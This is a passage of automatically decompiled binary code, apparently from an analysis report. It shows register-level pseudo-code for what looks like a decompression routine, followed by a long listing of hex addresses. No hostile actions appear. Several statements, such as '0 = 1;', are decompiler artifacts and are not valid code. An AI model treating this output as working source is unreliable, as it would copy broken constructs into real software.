											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E0040711C( &(__esi[3]), __edi, 0x101, 0x40841c, 0x40845c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E0040711C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40849c, 0x4084d8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}









                                                          0x00406945
                                                          0x00406945
                                                          0x00406945
                                                          0x00406945
                                                          0x00406945
                                                          0x00406949
                                                          0x00000000
                                                          0x00000000
                                                          0x0040694f
                                                          0x0040694f
                                                          0x00406952
                                                          0x00406955
                                                          0x0040695a
                                                          0x0040695c
                                                          0x0040695f
                                                          0x00406962
                                                          0x00406965
                                                          0x00406965
                                                          0x00406968
                                                          0x00000000
                                                          0x00000000
                                                          0x0040696a
                                                          0x0040696a
                                                          0x0040696d
                                                          0x00406972
                                                          0x00406974
                                                          0x00406977
                                                          0x0040697d
                                                          0x004066dc
                                                          0x004066dc
                                                          0x004066df
                                                          0x004066e5
                                                          0x004066eb
                                                          0x004066f4
                                                          0x004066fa
                                                          0x004066fd
                                                          0x00406704
                                                          0x00406709
                                                          0x0040670f
                                                          0x0040671a
                                                          0x0040671a
                                                          0x00406983
                                                          0x00406983
                                                          0x0040698d
                                                          0x00000000
                                                          0x00000000
                                                          0x00406993
                                                          0x00406993
                                                          0x00406997
                                                          0x0040699a
                                                          0x0040699a
                                                          0x0040699e
                                                          0x004069a4
                                                          0x004069a4
                                                          0x004069a7
                                                          0x004069aa
                                                          0x004069b0
                                                          0x00000000
                                                          0x00000000
                                                          0x004069b2
                                                          0x004069d4
                                                          0x004069d4
                                                          0x004069d7
                                                          0x00000000
                                                          0x00000000
                                                          0x004069b4
                                                          0x004069b8
                                                          0x00000000
                                                          0x00000000
                                                          0x004069be
                                                          0x004069be
                                                          0x004069c1
                                                          0x004069c4
                                                          0x004069c9
                                                          0x004069cb
                                                          0x004069ce
                                                          0x004069d1
                                                          0x004069d1
                                                          0x004069d9
                                                          0x004069d9
                                                          0x004069df
                                                          0x004069e2
                                                          0x004069e5
                                                          0x004069e5
                                                          0x004069ec
                                                          0x004069f0
                                                          0x004069f4
                                                          0x004069f7
                                                          0x004069fa
                                                          0x00406a00
                                                          0x00406a05
                                                          0x00000000
                                                          0x00000000
                                                          0x00406a07
                                                          0x00406a1b
                                                          0x00406a1b
                                                          0x00406a1f
                                                          0x00000000
                                                          0x00000000
                                                          0x00406a09
                                                          0x00406a0c
                                                          0x00406a0c
                                                          0x00406a13
                                                          0x00406a18
                                                          0x00406a18
                                                          0x00406a18
                                                          0x00406a21
                                                          0x00406a21
                                                          0x00406a24
                                                          0x00406a32
                                                          0x00406a38
                                                          0x00406a3d
                                                          0x00406a43
                                                          0x00406a49
                                                          0x00406a4f
                                                          0x00406a56
                                                          0x00406a6a
                                                          0x00406a6a
                                                          0x00407039
                                                          0x00407039
                                                          0x00407039
                                                          0x0040703e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406676
                                                          0x00406676
                                                          0x00000000
                                                          0x00406c71
                                                          0x00406c71
                                                          0x00406c75
                                                          0x00406c78
                                                          0x00406c7b
                                                          0x00406c7e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c84
                                                          0x00406c84
                                                          0x00406ca9
                                                          0x00406ca9
                                                          0x00406ca9
                                                          0x00406cab
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c89
                                                          0x00406c89
                                                          0x00406c8d
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c93
                                                          0x00406c93
                                                          0x00406c96
                                                          0x00406c99
                                                          0x00406c9c
                                                          0x00406c9e
                                                          0x00406ca0
                                                          0x00406ca3
                                                          0x00406ca6
                                                          0x00406ca6
                                                          0x00406ca6
                                                          0x00406cad
                                                          0x00406cad
                                                          0x00406cb5
                                                          0x00406cb8
                                                          0x00406cbb
                                                          0x00406cbe
                                                          0x00406cc2
                                                          0x00406cc5
                                                          0x00406cc7
                                                          0x00406cca
                                                          0x00406ccc
                                                          0x00406ce0
                                                          0x00406ce0
                                                          0x00406ce3
                                                          0x00406cfd
                                                          0x00406cfd
                                                          0x00406d00
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d06
                                                          0x00406d06
                                                          0x00406d09
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d0f
                                                          0x00406d0f
                                                          0x00000000
                                                          0x00406d0f
                                                          0x00406ce5
                                                          0x00406ce8
                                                          0x00406cef
                                                          0x00406cf2
                                                          0x00000000
                                                          0x00406cf2
                                                          0x00406cce
                                                          0x00406cd2
                                                          0x00406cd5
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d1a
                                                          0x00406d1a
                                                          0x00406d3f
                                                          0x00406d3f
                                                          0x00406d3f
                                                          0x00406d41
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d1f
                                                          0x00406d1f
                                                          0x00406d23
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d29
                                                          0x00406d29
                                                          0x00406d2c
                                                          0x00406d2f
                                                          0x00406d32
                                                          0x00406d34
                                                          0x00406d36
                                                          0x00406d39
                                                          0x00406d3c
                                                          0x00406d3c
                                                          0x00406d3c
                                                          0x00406d43
                                                          0x00406d4b
                                                          0x00406d4e
                                                          0x00406d51
                                                          0x00406d53
                                                          0x00406d56
                                                          0x00406d56
                                                          0x00406d58
                                                          0x00406d5c
                                                          0x00406d5f
                                                          0x00406d62
                                                          0x00406d65
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d6b
                                                          0x00406d6b
                                                          0x00406d90
                                                          0x00406d90
                                                          0x00406d90
                                                          0x00406d92
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d70
                                                          0x00406d70
                                                          0x00406d74
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d7a
                                                          0x00406d7a
                                                          0x00406d7d
                                                          0x00406d80
                                                          0x00406d83
                                                          0x00406d85
                                                          0x00406d87
                                                          0x00406d8a
                                                          0x00406d8d
                                                          0x00406d8d
                                                          0x00406d8d
                                                          0x00406d94
                                                          0x00406d94
                                                          0x00406d9c
                                                          0x00406d9f
                                                          0x00406da2
                                                          0x00406da5
                                                          0x00406da9
                                                          0x00406dac
                                                          0x00406dae
                                                          0x00406db1
                                                          0x00406db4
                                                          0x00406dce
                                                          0x00406dce
                                                          0x00406dd1
                                                          0x00000000
                                                          0x00000000
                                                          0x00406dd7
                                                          0x00406dd7
                                                          0x00406dda
                                                          0x00406de1
                                                          0x00000000
                                                          0x00406de1
                                                          0x00406db6
                                                          0x00406db9
                                                          0x00406dc0
                                                          0x00406dc3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406de9
                                                          0x00406de9
                                                          0x00406e0e
                                                          0x00406e0e
                                                          0x00406e0e
                                                          0x00406e10
                                                          0x00000000
                                                          0x00000000
                                                          0x00406dee
                                                          0x00406dee
                                                          0x00406df2
                                                          0x00000000
                                                          0x00000000
                                                          0x00406df8
                                                          0x00406df8
                                                          0x00406dfb
                                                          0x00406dfe
                                                          0x00406e01
                                                          0x00406e03
                                                          0x00406e05
                                                          0x00406e08
                                                          0x00406e0b
                                                          0x00406e0b
                                                          0x00406e0b
                                                          0x00406e12
                                                          0x00406e1a
                                                          0x00406e1d
                                                          0x00406e20
                                                          0x00406e22
                                                          0x00406e25
                                                          0x00406e25
                                                          0x00406e27
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e2d
                                                          0x00406e2d
                                                          0x00406e30
                                                          0x00406e35
                                                          0x00406e37
                                                          0x00406e3d
                                                          0x00406e3f
                                                          0x00406e54
                                                          0x00406e56
                                                          0x00406e56
                                                          0x00406e41
                                                          0x00406e47
                                                          0x00406e49
                                                          0x00406e4b
                                                          0x00406e4b
                                                          0x00406e58
                                                          0x00406e5c
                                                          0x00406e5f
                                                          0x00406e65
                                                          0x00406e65
                                                          0x00406e68
                                                          0x00406e68
                                                          0x00406e68
                                                          0x00406e6a
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e70
                                                          0x00406e70
                                                          0x00406e76
                                                          0x00406e78
                                                          0x00406e9d
                                                          0x00406ea0
                                                          0x00406ea6
                                                          0x00406eab
                                                          0x00406eb1
                                                          0x00406eb7
                                                          0x00406eb9
                                                          0x00406ebc
                                                          0x00406ec5
                                                          0x00406ecb
                                                          0x00406ecb
                                                          0x00406ebe
                                                          0x00406ec0
                                                          0x00406ec2
                                                          0x00406ec2
                                                          0x00406ecd
                                                          0x00406ed3
                                                          0x00406ed5
                                                          0x00406ed8
                                                          0x00406eda
                                                          0x00406ee0
                                                          0x00406ee2
                                                          0x00406ee4
                                                          0x00406ee6
                                                          0x00406ee8
                                                          0x00406eeb
                                                          0x00406ef4
                                                          0x00406ef7
                                                          0x00406ef7
                                                          0x00406eed
                                                          0x00406eed
                                                          0x00406ef0
                                                          0x00406ef0
                                                          0x00406eeb
                                                          0x00406ee2
                                                          0x00406ef9
                                                          0x00406efb
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406efb
                                                          0x00406e7a
                                                          0x00406e7a
                                                          0x00406e80
                                                          0x00406e86
                                                          0x00406e88
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e8a
                                                          0x00406e8a
                                                          0x00406e8c
                                                          0x00406e8e
                                                          0x00406e97
                                                          0x00406e97
                                                          0x00406e90
                                                          0x00406e90
                                                          0x00406e93
                                                          0x00406e93
                                                          0x00406e99
                                                          0x00406e9b
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f01
                                                          0x00406f01
                                                          0x00406f06
                                                          0x00406f08
                                                          0x00406f09
                                                          0x00406f0a
                                                          0x00406f0b
                                                          0x00406f11
                                                          0x00406f14
                                                          0x00406f17
                                                          0x00406f1a
                                                          0x00406f1c
                                                          0x00406f22
                                                          0x00406f22
                                                          0x00406f25
                                                          0x00406f25
                                                          0x00406f25
                                                          0x00406f25
                                                          0x00406f2e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f33
                                                          0x00406f33
                                                          0x00406f36
                                                          0x00406f39
                                                          0x00406f3b
                                                          0x00406fd2
                                                          0x00406fd2
                                                          0x00406fd5
                                                          0x00406fd7
                                                          0x00406fd8
                                                          0x00406fd9
                                                          0x00406fdc
                                                          0x00000000
                                                          0x00406fdc
                                                          0x00406f41
                                                          0x00406f41
                                                          0x00406f47
                                                          0x00406f49
                                                          0x00406f6e
                                                          0x00406f71
                                                          0x00406f77
                                                          0x00406f7c
                                                          0x00406f82
                                                          0x00406f88
                                                          0x00406f8a
                                                          0x00406f8d
                                                          0x00406f96
                                                          0x00406f9c
                                                          0x00406f9c
                                                          0x00406f8f
                                                          0x00406f91
                                                          0x00406f93
                                                          0x00406f93
                                                          0x00406f9e
                                                          0x00406fa4
                                                          0x00406fa6
                                                          0x00406fa9
                                                          0x00406fab
                                                          0x00406fb1
                                                          0x00406fb3
                                                          0x00406fb5
                                                          0x00406fb7
                                                          0x00406fb9
                                                          0x00406fbc
                                                          0x00406fc5
                                                          0x00406fc8
                                                          0x00406fc8
                                                          0x00406fbe
                                                          0x00406fbe
                                                          0x00406fc1
                                                          0x00406fc1
                                                          0x00406fbc
                                                          0x00406fb3
                                                          0x00406fca
                                                          0x00406fcc
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406fcc
                                                          0x00406f4b
                                                          0x00406f4b
                                                          0x00406f51
                                                          0x00406f57
                                                          0x00406f59
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f5b
                                                          0x00406f5b
                                                          0x00406f5d
                                                          0x00406f5f
                                                          0x00406f66
                                                          0x00406f66
                                                          0x00406f68
                                                          0x00406f61
                                                          0x00406f61
                                                          0x00406f63
                                                          0x00406f63
                                                          0x00406f6a
                                                          0x00406f6c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406fe4
                                                          0x00406fe4
                                                          0x00406fe7
                                                          0x00406fe9
                                                          0x00406fec
                                                          0x00406fef
                                                          0x00406fef
                                                          0x00406fef
                                                          0x00406fef
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040669d
                                                          0x00406681
                                                          0x00000000
                                                          0x00406687
                                                          0x0040668a
                                                          0x00406694
                                                          0x00406697
                                                          0x0040669a
                                                          0x00000000
                                                          0x0040669a
                                                          0x00406681
                                                          0x004066a5
                                                          0x004066a8
                                                          0x004066ac
                                                          0x004066b6
                                                          0x004066c0
                                                          0x004066c3
                                                          0x004066c9
                                                          0x004067fd
                                                          0x004067ff
                                                          0x00406805
                                                          0x00406808
                                                          0x0040680b
                                                          0x00000000
                                                          0x0040680b
                                                          0x004066cf
                                                          0x004066cf
                                                          0x004066d0
                                                          0x00406728
                                                          0x00406728
                                                          0x0040672f
                                                          0x004067d5
                                                          0x004067d5
                                                          0x004067da
                                                          0x004067dd
                                                          0x004067e2
                                                          0x004067e5
                                                          0x004067ea
                                                          0x004067ed
                                                          0x004067f2
                                                          0x004067f5
                                                          0x004067f5
                                                          0x00000000
                                                          0x00406735
                                                          0x00406735
                                                          0x00406735
                                                          0x00406735
                                                          0x00406739
                                                          0x00406739
                                                          0x0040675b
                                                          0x0040675e
                                                          0x00406760
                                                          0x00406763
                                                          0x00406768
                                                          0x0040673e
                                                          0x0040673e
                                                          0x00406743
                                                          0x00406745
                                                          0x00406747
                                                          0x0040674c
                                                          0x00406752
                                                          0x00406757
                                                          0x00406759
                                                          0x00406759
                                                          0x0040674e
                                                          0x0040674e
                                                          0x0040674e
                                                          0x0040674c
                                                          0x00000000
                                                          0x0040676a
                                                          0x00406797
                                                          0x0040679c
                                                          0x0040679e
                                                          0x0040679f
                                                          0x004067a1
                                                          0x004067a2
                                                          0x004067a2
                                                          0x004067a2
                                                          0x004067ca
                                                          0x004067cf
                                                          0x004067cf
                                                          0x00000000
                                                          0x004067cf
                                                          0x00406768
                                                          0x0040672f
                                                          0x004066d2
                                                          0x004066d2
                                                          0x004066d3
                                                          0x0040671d
                                                          0x00000000
                                                          0x0040671d
                                                          0x004066d5
                                                          0x004066d6
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406832
                                                          0x00406832
                                                          0x00406832
                                                          0x00406835
                                                          0x00000000
                                                          0x00000000
                                                          0x00406812
                                                          0x00406812
                                                          0x00406816
                                                          0x00000000
                                                          0x00000000
                                                          0x0040681c
                                                          0x0040681c
                                                          0x0040681f
                                                          0x00406822
                                                          0x00406827
                                                          0x00406829
                                                          0x0040682c
                                                          0x0040682f
                                                          0x0040682f
                                                          0x0040682f
                                                          0x00406837
                                                          0x00406837
                                                          0x0040683a
                                                          0x0040683c
                                                          0x00406841
                                                          0x00406844
                                                          0x00406846
                                                          0x00406849
                                                          0x00000000
                                                          0x00000000
                                                          0x0040684f
                                                          0x0040684f
                                                          0x00406851
                                                          0x00000000
                                                          0x00000000
                                                          0x00406857
                                                          0x00406857
                                                          0x0040685b
                                                          0x00000000
                                                          0x00000000
                                                          0x00406861
                                                          0x00406861
                                                          0x00406864
                                                          0x00406866
                                                          0x00406904
                                                          0x00406904
                                                          0x00406907
                                                          0x00406909
                                                          0x00406909
                                                          0x0040690c
                                                          0x0040690f
                                                          0x00406911
                                                          0x00406913
                                                          0x00406915
                                                          0x00406915
                                                          0x0040691e
                                                          0x00406923
                                                          0x00406926
                                                          0x00406929
                                                          0x0040692c
                                                          0x0040692f
                                                          0x0040692f
                                                          0x0040692f
                                                          0x00406932
                                                          0x00406938
                                                          0x00406938
                                                          0x0040693e
                                                          0x0040693e
                                                          0x0040693e
                                                          0x00000000
                                                          0x00406932
                                                          0x0040686c
                                                          0x0040686c
                                                          0x00406872
                                                          0x00406875
                                                          0x00406877
                                                          0x004068a2
                                                          0x004068a5
                                                          0x004068ab
                                                          0x004068b0
                                                          0x004068b6
                                                          0x004068bc
                                                          0x004068be
                                                          0x004068c1
                                                          0x004068ca
                                                          0x004068d0
                                                          0x004068d0
                                                          0x004068c3
                                                          0x004068c5
                                                          0x004068c7
                                                          0x004068c7
                                                          0x004068d2
                                                          0x004068d8
                                                          0x004068db
                                                          0x004068dd
                                                          0x004068df
                                                          0x004068e5
                                                          0x004068e7
                                                          0x004068e9
                                                          0x004068ec
                                                          0x004068f5
                                                          0x004068f5
                                                          0x004068f7
                                                          0x004068ee
                                                          0x004068ee
                                                          0x004068f1
                                                          0x004068f1
                                                          0x004068f9
                                                          0x004068f9
                                                          0x004068e7
                                                          0x004068fc
                                                          0x004068fe
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004068fe
                                                          0x00406879
                                                          0x00406879
                                                          0x0040687f
                                                          0x00406885
                                                          0x00406887
                                                          0x00000000
                                                          0x00000000
                                                          0x00406889
                                                          0x00406889
                                                          0x0040688b
                                                          0x0040688d
                                                          0x00406890
                                                          0x00406897
                                                          0x00406897
                                                          0x00406899
                                                          0x00406892
                                                          0x00406892
                                                          0x00406894
                                                          0x00406894
                                                          0x0040689b
                                                          0x0040689d
                                                          0x004068a0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004069a4
                                                          0x004069a7
                                                          0x004069aa
                                                          0x004069b0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406b87
                                                          0x00406b87
                                                          0x00406b87
                                                          0x00406b8a
                                                          0x00406b8d
                                                          0x00406b8f
                                                          0x00406b92
                                                          0x00406b98
                                                          0x00406b9f
                                                          0x00406ba1
                                                          0x00000000
                                                          0x00000000
                                                          0x00406a75
                                                          0x00406a75
                                                          0x00406a9d
                                                          0x00406a9d
                                                          0x00406a9d
                                                          0x00406a9f
                                                          0x00000000
                                                          0x00000000
                                                          0x00406a7d
                                                          0x00406a7d
                                                          0x00406a81
                                                          0x00000000
                                                          0x00000000
                                                          0x00406a87
                                                          0x00406a87
                                                          0x00406a8a
                                                          0x00406a8d
                                                          0x00406a90
                                                          0x00406a92
                                                          0x00406a94
                                                          0x00406a97
                                                          0x00406a9a
                                                          0x00406a9a
                                                          0x00406a9a
                                                          0x00406aa1
                                                          0x00406aa1
                                                          0x00406aa9
                                                          0x00406aac
                                                          0x00406ab2
                                                          0x00406ab5
                                                          0x00406ab9
                                                          0x00406abd
                                                          0x00406ac0
                                                          0x00406ac3
                                                          0x00406adb
                                                          0x00406adb
                                                          0x00406ade
                                                          0x00406aec
                                                          0x00406aef
                                                          0x00406ae0
                                                          0x00406ae0
                                                          0x00406ae2
                                                          0x00406ae9
                                                          0x00406ae9
                                                          0x00406b18
                                                          0x00406b18
                                                          0x00406b18
                                                          0x00406b1b
                                                          0x00406b1d
                                                          0x00000000
                                                          0x00000000
                                                          0x00406af8
                                                          0x00406af8
                                                          0x00406afc
                                                          0x00000000
                                                          0x00000000
                                                          0x00406b02
                                                          0x00406b02
                                                          0x00406b05
                                                          0x00406b08
                                                          0x00406b0b
                                                          0x00406b0d
                                                          0x00406b0f
                                                          0x00406b12
                                                          0x00406b15
                                                          0x00406b15
                                                          0x00406b15
                                                          0x00406b1f
                                                          0x00406b1f
                                                          0x00406b21
                                                          0x00406b23
                                                          0x00406b2e
                                                          0x00406b31
                                                          0x00406b34
                                                          0x00406b36
                                                          0x00406b38
                                                          0x00406b3a
                                                          0x00406b3d
                                                          0x00406b40
                                                          0x00406b45
                                                          0x00406b48
                                                          0x00406b4b
                                                          0x00406b4e
                                                          0x00406b55
                                                          0x00406b58
                                                          0x00406b5a
                                                          0x00000000
                                                          0x00000000
                                                          0x00406b60
                                                          0x00406b60
                                                          0x00406b64
                                                          0x00406b75
                                                          0x00406b75
                                                          0x00406b75
                                                          0x00406b77
                                                          0x00406b77
                                                          0x00406b7b
                                                          0x00406b7b
                                                          0x00406b7b
                                                          0x00406b7d
                                                          0x00406b7e
                                                          0x00406b81
                                                          0x00406b81
                                                          0x00406b81
                                                          0x00406b84
                                                          0x00000000
                                                          0x00406b84
                                                          0x00406b66
                                                          0x00406b66
                                                          0x00406b69
                                                          0x00000000
                                                          0x00000000
                                                          0x00406b6f
                                                          0x00406b6f
                                                          0x00000000
                                                          0x00406b6f
                                                          0x00406ac5
                                                          0x00406ac5
                                                          0x00406ac7
                                                          0x00406ac9
                                                          0x00406acc
                                                          0x00406acf
                                                          0x00406ad3
                                                          0x00406ad3
                                                          0x00406ba7
                                                          0x00406ba7
                                                          0x00406baa
                                                          0x00406bb1
                                                          0x00406bb5
                                                          0x00406bb7
                                                          0x00406bba
                                                          0x00406bbd
                                                          0x00406bc2
                                                          0x00406bc5
                                                          0x00406bc7
                                                          0x00406bc8
                                                          0x00406bcb
                                                          0x00406bd6
                                                          0x00406bd9
                                                          0x00406bf0
                                                          0x00406bf5
                                                          0x00406bfc
                                                          0x00406c01
                                                          0x00406c05
                                                          0x00406c07
                                                          0x00406c07
                                                          0x00406c07
                                                          0x00406c0a
                                                          0x00406c0c
                                                          0x00000000
                                                          0x00406c12
                                                          0x00406c12
                                                          0x00406c16
                                                          0x00406c21
                                                          0x00406c34
                                                          0x00406c39
                                                          0x00406c3e
                                                          0x00406c40
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c46
                                                          0x00406c46
                                                          0x00406c49
                                                          0x00406c4b
                                                          0x00406c59
                                                          0x00406c59
                                                          0x00406c5c
                                                          0x00406c5c
                                                          0x00406c5f
                                                          0x00406c62
                                                          0x00406c65
                                                          0x00406c68
                                                          0x00406c6b
                                                          0x00406c6e
                                                          0x00000000
                                                          0x00406c6e
                                                          0x00406c4d
                                                          0x00406c4d
                                                          0x00406c53
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c53
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ff2
                                                          0x00406ff2
                                                          0x00406ff8
                                                          0x00406ffe
                                                          0x00407003
                                                          0x00407009
                                                          0x0040700f
                                                          0x00407011
                                                          0x00407014
                                                          0x0040701d
                                                          0x00407023
                                                          0x00407023
                                                          0x00407016
                                                          0x00407018
                                                          0x0040701a
                                                          0x0040701a
                                                          0x00407025
                                                          0x00407027
                                                          0x0040702a
                                                          0x00407065
                                                          0x00407065
                                                          0x00000000
                                                          0x0040702c
                                                          0x0040702c
                                                          0x0040702c
                                                          0x00407032
                                                          0x00407035
